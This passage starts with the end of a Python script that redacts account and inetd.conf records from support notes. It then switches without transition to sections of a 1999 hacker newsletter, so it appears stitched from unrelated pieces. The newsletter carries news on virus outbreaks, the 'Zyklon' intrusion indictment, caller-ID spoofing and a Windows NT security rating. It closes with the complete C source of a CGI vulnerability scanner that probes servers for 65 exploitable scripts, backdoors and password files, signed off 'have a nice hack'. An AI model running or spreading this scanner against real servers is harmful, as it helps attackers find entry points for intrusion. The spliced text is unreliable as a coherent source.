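ftp stream tcp nowait root /usr/sbin/in.ftpd in.ftpd
Workaround: restored the previous /usr/lib/libc.so.1.
"""

# service  socket-type  protocol  wait/nowait  user  server-program ...
INETD_RE = re.compile(
    r"^\S+\s+(stream|dgram|raw|rdm|seqpacket)\s+\S+\s+(wait|nowait)\S*\s+\S+\s+\S+"
)


def classify_line(line):
    """Return 'passwd', 'shadow', 'inetd' or None for one line of case text."""
    fields = line.rstrip("\n").split(":")
    if len(fields) == 7 and fields[2].isdigit() and fields[3].isdigit():
        return "passwd"   # login:pw:uid:gid:gecos:home:shell
    if len(fields) == 9 and all(f == "" or f.isdigit() for f in fields[2:8]):
        return "shadow"   # login:hash:lastchg:min:max:warn:inactive:expire:flag
    if INETD_RE.match(line):
        return "inetd"
    return None


def scrub_case_notes(text):
    """Redact leaked account data and return (scrubbed_text, findings).

    findings maps each record kind to the number of lines seen, so the
    engineer can decide what must stay in the internal-only part of the case.
    """
    findings = {"passwd": 0, "shadow": 0, "inetd": 0}
    out = []
    for line in text.splitlines():
        kind = classify_line(line)
        if kind == "passwd":
            f = line.split(":")
            f[0], f[4], f[5] = "[login]", "[gecos]", "[home]"  # drop user names
            line = ":".join(f)
        elif kind == "shadow":
            f = line.split(":")
            f[0], f[1] = "[login]", "[hash]"   # drop names and password hashes
            line = ":".join(f)
        elif kind == "inetd":
            line = "[inetd.conf entry withheld]"  # network service configuration
        if kind:
            findings[kind] += 1
        out.append(line)
    return "\n".join(out) + "\n", findings


if __name__ == "__main__":
    scrubbed, report = scrub_case_notes(SAMPLE_NOTES)
    print(scrubbed)
    print("records found:", report)
```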
@HWA
09.0 [ISN] Asia is wide open to virus, hacker attacks
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Forwarded From: William Knowles <erehwon@kizmiaz.dis.org>
http://www.feer.com/Restricted/99may_20/tech.html
(Feer.com) [5.20.99] How personal are personal computers? At the rate
Asian companies and individuals are exposing their computers to on-line
infection and intrusion, they may as well drop the "P" from PC. The
information highways are proving very public, but many Asians are
travelling naked and defenceless.
Computer viruses are the region's biggest problem. Two major virus attacks
in March and April crippled hundreds of thousands of Asia's computers.
Then in late April, the Singapore government was caught snooping into PCs
without seeking permission from their owners. The incidents have
highlighted the need to protect PCs from viruses and unwanted
intruders--protection that's sorely lacking in the region.
While multinational companies now keep a constant vigil on the security of
their computer networks, many other companies and individuals have left
themselves vulnerable. To protect against viruses, they need to install
and diligently update antivirus software, which costs an average of $50
per program for personal use. Large companies have for many years
installed virtual "firewalls" that combine antivirus, antihacking and
other protective software, but antihacking and personal-data security
programs are only just becoming commercially available to individual PC
users.
The latest virus hit more than 650,000 computers in Asia. Named Chernobyl,
it remained dormant until April 26, the 13th anniversary of the Chernobyl
nuclear-plant disaster in Ukraine. On that day, the virus disabled
computers, destroyed programs and erased large amounts of stored
information. Xinhua news agency reported that 360,000 PCs were affected in
China. The virus's Taiwanese creator, 24-year-old Chen Ing-hau, said he
had wanted to cause mayhem on the mainland. Chen was arrested but released
without charge due to a lack of plaintiffs in Taiwan, where no infections
were reported.
"Chernobyl's been known about and treatable for over a year and still
people were caught out," says Daniel Schneersohn, Hong Kong-based
regional director for Symantec, an American maker of antivirus software.
He says many customers had such software installed, but had simply not
activated it. Half of the damaged PCs in China, for instance, had
protective software that was not turned on. Although most corporate PCs
shipped to South Korea since 1997 contain antivirus software, Chernobyl
infected an estimated 250,000 PCs in that country. Many companies allow
their employees to turn off antivirus software, which can slow down the
computer while it monitors infections. Many users had failed to keep
installed software up-to-date. "It's not enough to buy antivirus software
and install it or even activate it," says Schneersohn. "You've got to
update the software--the antivirus companies update the virus threat lists
every week."
Eric Sheridan, director of Asia business development for U.S.
computer-systems company Corporate Software & Technology, says most of his
customers, almost all multinationals, escaped Chernobyl unscathed. "Our
customers all have ongoing contracts for security and virus protection, or
they have good in-house teams at work," he explains.
Most at risk are individual PC users and companies with less sophisticated
information-technology departments, Sheridan says, especially as they make
increasing use of the Internet. "Once you have a few offices up and
on-line you have to take outside threats like viruses and hacking
seriously."
Schneersohn agrees that while multinational firms are taking these threats
seriously, the rest of the Asia-Pacific isn't. "Even some big listed
companies in Hong Kong don't use antivirus protection," he says.
Smaller businesses in particular have turned to pirated antivirus programs
during the economic crisis to keep costs down. But they lose the
advantages of software support and advice, says Schneersohn. "It's
software use at its lowest level and that's why the highest level of
infections are in small businesses and homes" where pirated programs are
most prevalent.
Still, even pirated-software users could have protected themselves by
downloading updates of antivirus programs from the manufacturer's Web
site. For now, most software companies don't bother to trace pirates who
download updates, says Schneersohn--although Symantec's next generation of
antivirus software will update only registered users.
Just as the dust settled from the Chernobyl attack, Internet users in
Singapore were faced with a more organized affront to their computer
privacy. SingNet, an Internet service provider, acknowledged that it asked
the Home Affairs Ministry's IT security unit to scan its customers' PCs
for viruses without their consent. SingNet is owned by Singapore Telecom,
which is in turn 80%-owned by the government. SingNet's actions only came
to light because a student, who had downloaded antihacker software from
the Internet onto her PC, traced the scan back to the ministry.
SingNet's home page on the Web apologizes for the intrusion--"We should
have informed you first," it says--and invites visitors to voluntarily
submit to the virus search instead. The company says the scanning did not
"enter" any PCs nor unveil any personal data. Also, SingNet claims it
found 900 PCs infected with "trojan horse" viruses that allow hackers to
enter computers via the Internet and take almost complete control.
The SingNet action and the discovery of the "trojan horse" viruses
highlight the ease with which PCs can be snooped on while on-line. "If
breaking in is so easy, some less scrupulous companies may well start
thinking that it might be worth throwing a few bucks at some kid to look
into their competitors' files," says Schneersohn.
For personal and small-business users, encryption is one option for
protecting confidential data from hackers. But use of encryption is either
illegal or legally untested in many Asian countries. A second option is to
remove confidential data to a separate disk drive and access it only when
the user is off-line.
To protect stored data while the user is on-line, demand will probably
grow among personal and small-business PC owners for simpler versions of
the "firewalls" that large companies use to protect their computer
networks from intrusion.
Schneersohn says antivirus software makers are already looking into the
market. "Many people want to block access to personal files to all third
parties--you could call it a personal firewall. They simply want to regain
control of what's happening on their computers."
-o-
Subscribe: mail majordomo@repsec.com with "subscribe isn".
Today's ISN Sponsor: Hacker News Network [www.hackernews.com]
@HWA
10.0 More on Zyklon's legal troubles
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
Zyklon Busted
contributed by Space Rogue
HNN first reported this news early Friday morning and has now learned more details. Zyklon
(Eric Burns) has now been charged with three counts of unlawful computer intrusion. The counts
are believed to be for alleged attacks on the USIA (US Information Agency) web site, which was
hosted by Electric Press in Herndon, Va. Other companies allegedly attacked were LaserNet in
Fairfax, Va.; and Issue Dynamic Inc., which also has machines in VA. The total damage estimates
are listed as $15,000 (which seems a little low compared to other similar cases). It is believed
that the Secret Service will also question Zyklon in connection with any involvement he may or may
not have had in the recent whitehouse.gov crack.
Copy of the Indictment
http://www.hackernews.com/orig/zyklon.html
MSNBC
http://www.msnbc.com/news/269584.asp
ABC News
http://abcnews.go.com/sections/tech/DailyNews/whitehousehacker990515.html
IN THE UNITED STATES DISTRICT COURT FOR THE
EASTERN DISTRICT OF VIRGINIA
Alexandria Division
UNITED STATES OF AMERICA      )
                              )
          v.                  )   Criminal No.
                              )
                              )   Counts 1-3: Computer Intrusion
ERIC BURNS                    )   (18 U.S.C. § 1030(a)(5))
also known as "Zyklon"        )
                              )
          Defendant.          )
INDICTMENT
May 1999 Term - At Alexandria, Virginia
COUNT 1
THE GRAND JURY CHARGES THAT:
From on or about August 25, 1998, through on or about
January 22, 1998, in the Eastern District of Virginia and
elsewhere, ERIC BURNS, also known as "Zyklon," defendant herein,
knowingly and intentionally caused transmissions from a computer
in Shoreline, Washington, of programs, information, codes, and
commands, and as a result of such conduct, intentionally caused
damage without authorization to a computer of Electric Press,
Herndon, Virginia, which was a protected computer used by and for
the United States Information Agency, an agency of the United
States Government, and the conduct affected the use of the
computer by and for the government and caused loss aggregating at
least $5,000 to at least one individual between August 25, 1998
and March 1, 1999.
(In violation of Title 18, United States Code, Section
1030(a)(5)(A).)
COUNT 2
THE GRAND JURY CHARGES THAT:
From on or about December 28, 1998, through on or about
December 31, 1998, in the Eastern District of Virginia and
elsewhere, ERIC BURNS, also known as "Zyklon," the defendant
herein, knowingly and intentionally caused transmissions from a
computer in Shoreline, Washington, of programs, information,
codes, and commands, and as a result of such conduct,
intentionally caused damage without authorization to a computer
of Computer Tech Services, doing business as LaserNet, in
Fairfax, Virginia, which was a protected computer used in interstate
commerce and communication, and caused loss
aggregating at least $5,000 to at least one individual between
December 28, 1998, and March 1, 1999.
(In violation of Title 18, United States Code, Section
1030(a)(5)(A).)
COUNT 3
THE GRAND JURY CHARGES THAT:
From on or about December 28, 1998, through on or about
January 11, 1999, in the Eastern District of Virginia and
elsewhere, ERIC BURNS, also known as "Zyklon," defendant herein,
knowingly and intentionally caused the transmission from a
computer in Shoreline, Washington, of programs, information,
codes, and commands, and as a result of such conduct,
intentionally caused damage without authorization to computers
operated by Issue Dynamics, Inc. in Alexandria, Virginia, and
Washington, D.C., which were protected computers used in
interstate commerce and communications, and caused loss
aggregating at least $5,000 to at least one individual between
December 28, 1998, and March 1, 1999.
(In violation of Title 18, United States Code, Section
1030(a)(5)(A).)
A TRUE BILL:
__________________________
FOREPERSON
UNITED STATES GRAND JURY
(signed)
______________________
Helen F. Fahey
United States Attorney
(signed)
______________________
Justin W. Williams
Assistant United States Attorney
Chief, Criminal Division
(signed)
______________________
Jack Henly
Assistant United States Attorney
Alleged USIA site hacker indicted
Grand jury hands down three counts of computer intrusion against Zyklon
By Brock N. Meeks
MSNBC
May 14 -- A federal grand jury in Virginia Thursday charged a Washington state man, Eric Burns, with
three counts of computer break-ins, including two high-profile hacks of the United States
Information Agency. Burns, well-known in the electronic underground by his code name Zyklon,
has also been questioned by the Secret Service in conjunction with other government site break-ins,
MSNBC has learned.
BURNS' CODE NAME, MENTIONED in court papers, taken from the poison gas used by the Nazis in
concentration camps, was mentioned on the recent hack of the White House Web site in a "shout out"
(hacker slang for words of praise for a fellow hacker).
However, no details were available as to whether Burns was being questioned by the Secret Service in
conjunction with the White House hack.
One source told MSNBC, after speaking with Burns, that the Secret Service questioned him about other
government sites but not the White House hack. The Secret Service declined to comment. However, a
source familiar with the investigation, which was carried out by the Computer Crimes Division of the
Federal Bureau of Investigation, confirmed that the bureau acknowledged another agency is also
investigating Burns.
Calls to the FBI to discuss their investigation of Burns were not returned. The three alleged break-ins
charged to Burns took place from August of last year to January, according to court papers.
Attempts to contact Burns, who lives in Shoreline, Wash., by phone, were unsuccessful. One source who spoke
to Burns said he was on a plane and heading for a court appearance in Virginia on Monday.
The three counts in the indictment are for attacks on the computers of Electric Press in Herndon, Va., which
hosts the USIA Web site; LaserNet in Fairfax, Va.; and Issue Dynamic Inc., which has computers in Alexandria,
Va., and Washington, D.C. Each count mentions damages of at least $5,000. The attack on USIA's web site in
January was particularly damaging and was the second time it had been allegedly hacked by Burns. Each of
those hacks was signed by Zyklon.
USIA, which operates the Voice of America broadcasts, is an extremely busy site; it's a clearinghouse for
U.S. information and heavily used by foreigners. The first USIA hack, which occurred in August,
destroyed a lot of the site's data, according to published reports at the time. The second break-in seemed to
be Burns' way of working out his frustrations owing to a lost love.
"Hack by Zyklon. Crystal, I love, (you?)" the hacked site said. In another Zyklon hacked site, this one of
BellSouth, he laments that he has massive depression, that he's a loser and that because of it "I will never
have my Crystal I will never be happy and I hope I goto [sic] prison and die."
Another hack attributed to Zyklon is that of the official Chinese human rights page, as seen on the Hacker News
Network, which mirrors the hacked site. This hack appears to be an act of so-called hacktivism in which hackers
break into systems, own them and put up politically charged speech.
-=-
ABC news;
Teen Hacker Indicted
Zyklon Not Charged in White House Attack
By Ted Bridis
The Associated Press
W A S H I N G T O N, May 15 -- A teen-ager identified as a computer hacker whose name appeared on the Internet
site for the White House after vandals altered it this week has been indicted in Virginia on charges he broke
into another government computer. A grand jury indicted Eric Burns, 19, on three counts of computer intrusion.
Burns, reportedly known on the Internet as Zyklon, was accused of breaking into a computer between August 1998
and January 1999 in northern Virginia that is used by the U.S. Information Agency. Zyklon was one of a dozen
names listed on the hacked version of the White House Web site, which was altered overnight Sunday for a few
minutes before government computers automatically detected the intrusion.
A Serious Effort
The indictment returned Thursday also accuses Burns of breaking into two other computers, one owned by LaserNet
of Fairfax, Va., and the other by Issue Dynamics of Washington. Sam Simon of Issue Dynamics said he was cooperating
with the FBI.
"We firmly believe that computer criminals need to be identified, prosecuted and caught, and we're pleased that
the FBI is not treating this as a minor matter. It wasn't an insignificant incident. It was a very concentrated,
serious effort over a period of time."
Burns was not charged in the attack on the White House computers. The opening page of the White House site was
altered briefly to show a black Web page with the names of the hacker organizations claiming responsibility, along
with the messages "Your box was own3d" and "Stop all the war."
The page also included the phrase "following peeps get some shouts," and listed a dozen names, including
Zyklon.
@HWA
11.0 IRC war and a Police HQ bomb threat send two headed for trouble..
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
CallerID Fooled In Omaha
contributed by hantai
A bomb threat was called in to the Omaha police headquarters recently. The Police responded to the
address reported by CallerID. While the police were at that address another bomb threat was called
in from the same number. US West says that there are some "technical pieces of equipment" the criminals
could use to make a phone call appear to come from someone's number without actually being at that phone.
(Yeah, it's called a butt set and telephone can on a street corner, real technical. Oh, and most of those
cans aren't even locked) HNN has received reports that the perpetrators of this prank are known as 'port'
and 'rottenboy' on IRC and did this in retaliation for not being opped on an IRC
channel.
Omaha NBC Affiliate Channel 6
http://www.discoveromaha.com/partners/wowt/news/1999/05/phone_threat_14.html
Police investigate mystery
A threatening phone call has led police to a mystery and so far the clues have turned up
nothing more than dead ends.
The call was made to Omaha police headquarters Thursday night: a bomb threat.
With caller I-D on police phones, the name and address of the alleged caller was quickly
discovered.
Police made their way to a northwest Omaha home.
Officer Don Savage says, "When they arrived, there they met a young man who said he had a
feeling that the police would be coming to his house that night."
The young man had received an anonymous message on his computer telling him to expect
a visit from the police.
While investigators were questioning the young man at his home, another call came in at police headquarters
from the same number and address.
Savage says, "911 contacted the sergeant on the scene at this house and asked 'is this the house?' And the
sergeant confirmed no one had made a phone call from that house."
Carla Ewert with U.S. West says, "There are some technical pieces of equipment that are available if someone's
going to use the phone lines dishonestly. And they technically could tap into someone's phone line
from outside the house, never have to be in the person's home."
Ewart says it's virtually impossible for someone to use their computer to call in a threat from someone else's
phone line. She says the connection between voice and data is separated.
Right now police aren't sure what the computer connection is, or how the scheme was carried out.
But a threat to their own house won't go unpunished.
Channel six news talked to the family whose phone line has been used in this scheme. They are also baffled as to
how their phone line was tapped.
Police say they intend to stay on the case until an arrest is made.
@HWA
12.0 UK Labels Windows as 'secure'
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
UK Labels Windows as Secure
contributed by toka25
The U.K. Information Technology Security Evaluation Criteria (ITSEC), must have been hit on the head,
dropped at birth, or be taking some really good drugs. Why? They have awarded Windows NT Server 4.0 and
Windows NT Workstation 4.0 an E3/FC-2 rating. Microsoft says that this is "the highest security
evaluation possible for a general-purpose operating system". Either this is all Microsoft spin or the
testers have never heard about things like pwdump or L0phtCrack.
Microsoft Propaganda
http://www.microsoft.com/windows/dailynews/042999.htm
April 29, 1999
U.K. government evaluation confirms security
of Microsoft Windows NT 4.0 platform
Windows NT platform receives high security evaluation
London -- The British government this week concluded that the
Microsoft® Windows NT® platform passes muster when it comes to
security.
After more than a year of intensive testing, the U.K.
Information Technology Security Evaluation Criteria
(ITSEC) certification board has awarded Windows NT
Server 4.0 and Windows NT Workstation 4.0 an
E3/FC-2 rating -- generally acknowledged as the
highest security evaluation possible for a
general-purpose operating system. The security
standards agency evaluation included examinations of the source
code and design documentation of Windows NT 4.0 with Service Pack
3. Testers also had direct access to the engineers who designed and
tested the server operating system.
Their conclusion: the Windows NT 4.0 architecture provides robust
but flexible security.
"The successful ITSEC evaluation confirms the robust security and
design of Windows NT," said Edmund Muth, group product manager at
Microsoft. "The strong security and wide range of security-related
features in Windows NT benefit customers -- both those in industries
where security is a paramount concern, like banking, government,
healthcare and the military -- and individuals who are concerned about
their privacy and e-commerce."
The comprehensive security architecture in the Windows NT platform
provides that level of safety. Its integrated security features include
strong authentication, fine-grained access control, real-world auditing
tools and secure communications.
Governments and enterprises around the world have already put
those features to use.
Last Fall, Brazil used a Windows NT-based network to securely host
the largest electronic elections in history. Requiring the highest level
of security, nearly 90 percent of NATO's headquarters and field sites
in Europe and the United States use a Windows NT-based system to
deliver tactical data and military messaging.
And in the private sector, one of New Zealand's largest banks counts
on Windows NT to provide secure banking over the Internet.
The ITSEC rating provides independent confirmation of the platform's
security features. ITSEC is the only evaluation scheme recognized by
the British government for use in secure and sensitive installations. It
is also officially recognized by the governments of many European
Union countries, Canada, the former Soviet republics and, with slight
variations, in New Zealand and Australia.
The E3/F-C2 evaluation is roughly equivalent to a
C2 evaluation under the U.S. Trusted Computer
Security Evaluation Criteria (TCSEC) regime,
better known as the "Orange Book." Microsoft is
separately pursuing a C2 evaluation for Windows NT 4.0, which is
expected to be completed shortly.
But security isn't the only thing this platform offers.
The multipurpose server operating system that forms the foundation
of the BackOffice® family, Windows NT Server 4.0 offers a
comprehensive set of services. From communications and file and
print services to a platform for building and hosting Web- and
client-server-based applications, Windows NT Server is built to meet
the many needs of business.
Windows NT Workstation 4.0, developed specifically for the business
environment, makes it easy to use, manage and integrate those
features. The operating system gives employees the intuitive look and
feel of Windows® 98, so companies can cut training costs, and
people can work productively right from the start.
The Windows NT platform is also the quickest path to Windows 2000,
which is designed to be Microsoft's most robust and reliable operating
system to date. Windows 2000 is also designed with security in mind.
Microsoft is taking orders for the Beta 3 versions of Windows 2000
Server and Workstation.
After Microsoft releases Windows 2000, the company plans to submit
the operating system for a similar security evaluation under the
Common Criteria, a new evaluation system that will consolidate the
TCSEC and ITSEC criteria.
The results of which could further the Windows platform's reputation
of providing secure computing.
@HWA
13.0 Yugoslavia to stay plugged in
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
Yugoslavia to Stay Online
contributed by Code Kid
After all the confusion of whether companies should or
should not pull the plug on Yugoslavia the Clinton
administration has promised not to unplug the region
from the rest of the net.
Wired
http://www.wired.com/news/news/politics/story/19697.html
14.0 VISA Releases Draft Protection Profile
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Kingpin
According to Schneier's Crypto-Gram Visa has issued a draft of the "Visa Smart Card Protection Profile," as part
of the Common Criteria. It contains a very nice list of smart card attacks. The document is a draft, and they
want comments.
Visa Smart Card Protection Profile
http://www.visa.com/nt/chip/accept.html (you must agree to a disclaimer before being allowed to dl
this pdf document)
The Visa document references the Common Criteria:
Common Criteria
http://csrc.ncsl.nist.gov/cc/
15.0 cgichk v1.35 by su1d sh3ll now scans for 65 vulnerabilities
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
/* ---------------------------------------------------------------------- */
/* CGI scanner v1.35, m0dify and recode by su1d sh3ll //UnlG 1999 */
/* Tested on Slackware linux with kernel 2.0.35;RH 5.2(2.0.36); */
/* FreeBSD 2.2.2-3.1;IRIX 5.3 */
/* Source c0de by [CKS & Fdisk] */
/* gr33tz to: Packet St0rm and Ken, ADM crew, ech0 security and CKS, ch4x,*/
/* el8.org users, #c0de, rain.forest.puppy/[WT], MnemoniX , */
/* hypoclear of lUSt,codex ;-) , K.A.L.U.G. */
/* fuck to: www.hackzone.ru , HDT... CHC fuck u 2 , llamaz */
/* NATO and bill klinton <---- double fuck! :-) huh */
/* c0ming s00n: add-on for CGI scanner - for scan "C" class subnet & logs */
/* -----------------------------------------------[10:01 17.05.99 UnlG]- */
#include <fcntl.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <signal.h>
#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <ctype.h>
#include <arpa/nameser.h>
#include <sys/stat.h>
#include <strings.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
int main(int argc, char *argv[])
{
int sock,debugm=0;
struct in_addr addr;
struct sockaddr_in sin;
struct hostent *he;
unsigned long start;
unsigned long end;
unsigned long counter;
char foundmsg[] = "200";
char *cgistr;
char buffer[1024];
int count=0;
int numin,suxes=0;
char cgibuff[1024];
char *buff[100]; /* Don't u think 100 is enought? ;-)*/
char *cginame[100]; /* Don't u think 100 is enought? */
buff[1] = "GET /cgi-bin/unlg1.1 HTTP/1.0\n\n";
/* v0rt-fu when u modify source, check this first line.... that's my 8-) */
buff[2] = "GET /cgi-bin/rwwwshell.pl HTTP/1.0\n\n";
buff[3] = "GET /cgi-bin/phf HTTP/1.0\n\n";
buff[4] = "GET /cgi-bin/Count.cgi HTTP/1.0\n\n";
buff[5] = "GET /cgi-bin/test-cgi HTTP/1.0\n\n";
buff[6] = "GET /cgi-bin/nph-test-cgi HTTP/1.0\n\n";
buff[7] = "GET /cgi-bin/nph-publish HTTP/1.0\n\n";
buff[8] = "GET /cgi-bin/php.cgi HTTP/1.0\n\n";
buff[9] = "GET /cgi-bin/handler HTTP/1.0\n\n";
buff[10] = "GET /cgi-bin/webgais HTTP/1.0\n\n";
buff[11] = "GET /cgi-bin/websendmail HTTP/1.0\n\n";
buff[12] = "GET /cgi-bin/webdist.cgi HTTP/1.0\n\n";
buff[13] = "GET /cgi-bin/faxsurvey HTTP/1.0\n\n";
buff[14] = "GET /cgi-bin/htmlscript HTTP/1.0\n\n";
buff[15] = "GET /cgi-bin/pfdispaly.cgi HTTP/1.0\n\n";
buff[16] = "GET /cgi-bin/perl.exe HTTP/1.0\n\n";
buff[17] = "GET /cgi-bin/wwwboard.pl HTTP/1.0\n\n";
buff[18] = "GET /cgi-bin/www-sql HTTP/1.0\n\n";
buff[19] = "GET /cgi-bin/view-source HTTP/1.0\n\n";
buff[20] = "GET /cgi-bin/campas HTTP/1.0\n\n";
buff[21] = "GET /cgi-bin/aglimpse HTTP/1.0\n\n";
buff[22] = "GET /cgi-bin/glimpse HTTP/1.0\n\n";
buff[23] = "GET /cgi-bin/man.sh HTTP/1.0\n\n";
buff[24] = "GET /cgi-bin/AT-admin.cgi HTTP/1.0\n\n";
buff[25] = "GET /cgi-bin/filemail.pl HTTP/1.0\n\n";
buff[26] = "GET /cgi-bin/maillist.pl HTTP/1.0\n\n";
buff[27] = "GET /cgi-bin/jj HTTP/1.0\n\n";
buff[28] = "GET /cgi-bin/info2www HTTP/1.0\n\n";
buff[29] = "GET /cgi-bin/files.pl HTTP/1.0\n\n";
buff[30] = "GET /cgi-bin/finger HTTP/1.0\n\n";
buff[31] = "GET /cgi-bin/bnbform.cgi HTTP/1.0\n\n";
buff[32] = "GET /cgi-bin/survey.cgi HTTP/1.0\n\n";
buff[33] = "GET /cgi-bin/AnyForm2 HTTP/1.0\n\n";
buff[34] = "GET /cgi-bin/textcounter.pl HTTP/1.0\n\n";
buff[35] = "GET /cgi-bin/classifieds.cgi HTTP/1.0\n\n";
buff[36] = "GET /cgi-bin/environ.cgi HTTP/1.0\n\n";
buff[37] = "GET /cgi-bin/wrap HTTP/1.0\n\n";
buff[38] = "GET /cgi-bin/cgiwrap HTTP/1.0\n\n";
buff[39] = "GET /cgi-bin/guestbook.cgi HTTP/1.0\n\n";
buff[40] = "GET /cgi-bin/edit.pl HTTP/1.0\n\n";
buff[41] = "GET /cgi-bin/perlshop.cgi HTTP/1.0\n\n";
buff[42] = "GET /_vti_inf.html HTTP/1.0\n\n";
buff[43] = "GET /_vti_pvt/service.pwd HTTP/1.0\n\n";
buff[44] = "GET /_vti_pvt/users.pwd HTTP/1.0\n\n";
buff[45] = "GET /_vti_pvt/authors.pwd HTTP/1.0\n\n";
buff[46] = "GET /_vti_pvt/administrators.pwd HTTP/1.0\n\n";
buff[47] = "GET /_vti_bin/shtml.dll HTTP/1.0\n\n";
buff[48] = "GET /_vti_bin/shtml.exe HTTP/1.0\n\n";
buff[49] = "GET /cgi-dos/args.bat HTTP/1.0\n\n";
buff[50] = "GET /cgi-win/uploader.exe HTTP/1.0\n\n";
buff[51] = "GET /cgi-bin/rguest.exe HTTP/1.0\n\n";
buff[52] = "GET /cgi-bin/wguest.exe HTTP/1.0\n\n";
buff[53] = "GET /scripts/issadmin/bdir.htr HTTP/1.0\n\n";
buff[54] = "GET /scripts/CGImail.exe HTTP/1.0\n\n";
buff[55] = "GET /scripts/tools/newdsn.exe HTTP/1.0\n\n";
buff[56] = "GET /scripts/fpcount.exe HTTP/1.0\n\n";
buff[57] = "GET /cfdocs/expelval/openfile.cfm HTTP/1.0\n\n";
buff[58] = "GET /cfdocs/expelval/exprcalc.cfm HTTP/1.0\n\n";
buff[59] = "GET /cfdocs/expelval/displayopenedfile.cfm HTTP/1.0\n\n";
buff[60] = "GET /cfdocs/expelval/sendmail.cfm HTTP/1.0\n\n";
buff[61] = "GET /iissamples/exair/howitworks/codebrws.asp HTTP/1.0\n\n";
buff[62] = "GET /iissamples/sdk/asp/docs/codebrws.asp HTTP/1.0\n\n";
buff[63] = "GET /msads/Samples/SELECTOR/showcode.asp HTTP/1.0\n\n";
buff[64] = "GET /search97.vts HTTP/1.0\n\n";
buff[65] = "GET /carbo.dll HTTP/1.0\n\n"; /* we have at archive about 70 CGi ,
rule? ;-) */
cginame[1] = "UnlG - backd00r ";
cginame[2] = "THC - backd00r ";
cginame[3] = "phf..classic :) ";
cginame[4] = "Count.cgi ";
cginame[5] = "test-cgi ";
cginame[6] = "nph-test-cgi ";
cginame[7] = "nph-publish ";
cginame[8] = "php.cgi ";
cginame[9] = "handler ";
cginame[10] = "webgais ";
cginame[11] = "websendmail ";
cginame[12] = "webdist.cgi ";
cginame[13] = "faxsurvey ";
cginame[14] = "htmlscript ";
cginame[15] = "pfdisplay ";
cginame[16] = "perl.exe ";
cginame[17] = "wwwboard.pl ";
cginame[18] = "www-sql ";
cginame[19] = "view-source ";
cginame[20] = "campas ";
cginame[21] = "aglimpse ";
cginame[22] = "glimpse ";
cginame[23] = "man.sh ";
cginame[24] = "AT-admin.cgi ";
cginame[25] = "filemail.pl ";
cginame[26] = "maillist.pl ";
cginame[27] = "jj ";
cginame[28] = "info2www ";
cginame[29] = "files.pl ";
cginame[30] = "finger ";
cginame[31] = "bnbform.cgi ";
cginame[32] = "survey.cgi ";
cginame[33] = "AnyForm2 ";
cginame[34] = "textcounter.pl ";
cginame[35] = "classifields.cgi";
cginame[36] = "environ.cgi ";
cginame[37] = "wrap ";
cginame[38] = "cgiwrap ";
cginame[39] = "guestbook.cgi ";
cginame[40] = "edit.pl ";
cginame[41] = "perlshop.cgi ";
cginame[42] = "_vti_inf.html ";
cginame[43] = "service.pwd ";
cginame[44] = "users.pwd ";
cginame[45] = "authors.pwd ";
cginame[46] = "administrators ";
cginame[47] = "shtml.dll ";
cginame[48] = "shtml.exe ";
cginame[49] = "args.bat ";
cginame[50] = "uploader.exe ";
cginame[51] = "rguest.exe ";
cginame[52] = "wguest.exe ";
cginame[53] = "bdir - samples ";
cginame[54] = "CGImail.exe ";
cginame[55] = "newdsn.exe ";
cginame[56] = "fpcount.exe ";
cginame[57] = "openfile.cfm ";
cginame[58] = "exprcalc.cfm ";
cginame[59] = "dispopenedfile ";
cginame[60] = "sendmail.cfm ";
cginame[61] = "codebrws.asp ";
cginame[62] = "codebrws.asp 2 ";
cginame[63] = "showcode.asp ";
cginame[64] = "search97.vts ";
cginame[65] = "carbo.dll ";
if (argc<2)
{
printf("\n [-- CGI Checker 1.35. Modified by su1d sh3ll //UnlG --]");
printf("\nusage : %s host ",argv[0]);
printf("\n Or : %s host -d for debug mode\n\n",argv[0]);
exit(0);
}
if (argc>2)
{
if(strstr("-d",argv[2]))
{
debugm=1;
}
}
if ((he=gethostbyname(argv[1])) == NULL)
{
herror("gethostbyname");
exit(0);
}
printf("\n\n\t [CKS & Fdisk]'s CGI Checker - modify by su1d sh3ll //UnlG\n\n\n");
start=inet_addr(argv[1]);
counter=ntohl(start);
sock=socket(AF_INET, SOCK_STREAM, 0);
bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length);
sin.sin_family=AF_INET;
sin.sin_port=htons(80); /* <--- if u want scan another port change it */
/* codex when u again change this code pls call
proggi like this 1.35.1 or 1.35.[a..z] ;-) */
if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0)
{
perror("connect");
}
printf("\n\n\t [ Press any key to check out the httpd version...... ]\n");
getchar(); /* CKS sorry, but ur new piece of code don't work :-( */
send(sock, "HEAD / HTTP/1.0\n\n",17,0);
recv(sock, buffer, sizeof(buffer),0);
printf("%s",buffer);
close(sock);
printf("\n\t [ Press any key to search 4 CGI stuff...... ]\n");
getchar();
while(count++ < 65) /* huh! 65 cgi..... no secur1ty in th1s w0rld ;-)*/
{
sock=socket(AF_INET, SOCK_STREAM, 0);
bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length);
sin.sin_family=AF_INET;
sin.sin_port=htons(80);
if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0)
{
perror("connect");
}
printf("Searching for %s : ",cginame[count]);
for(numin=0;numin < 1024;numin++)
{
cgibuff[numin] = '\0';
}
send(sock, buff[count],strlen(buff[count]),0);
recv(sock, cgibuff, sizeof(cgibuff),0);
cgistr = strstr(cgibuff,foundmsg);
if( cgistr != NULL) {
printf("Found !! ;)\n");++suxes; }
else
printf("Not Found\n");
if(debugm==1)
{
printf("\n\n ------------------------\n %s \n ------------------------\n",cgibuff);
printf("Press any key to continue....\n"); getchar();
}
close(sock);
}
if (suxes){ printf("...have a nice hack... ;-)\n");}
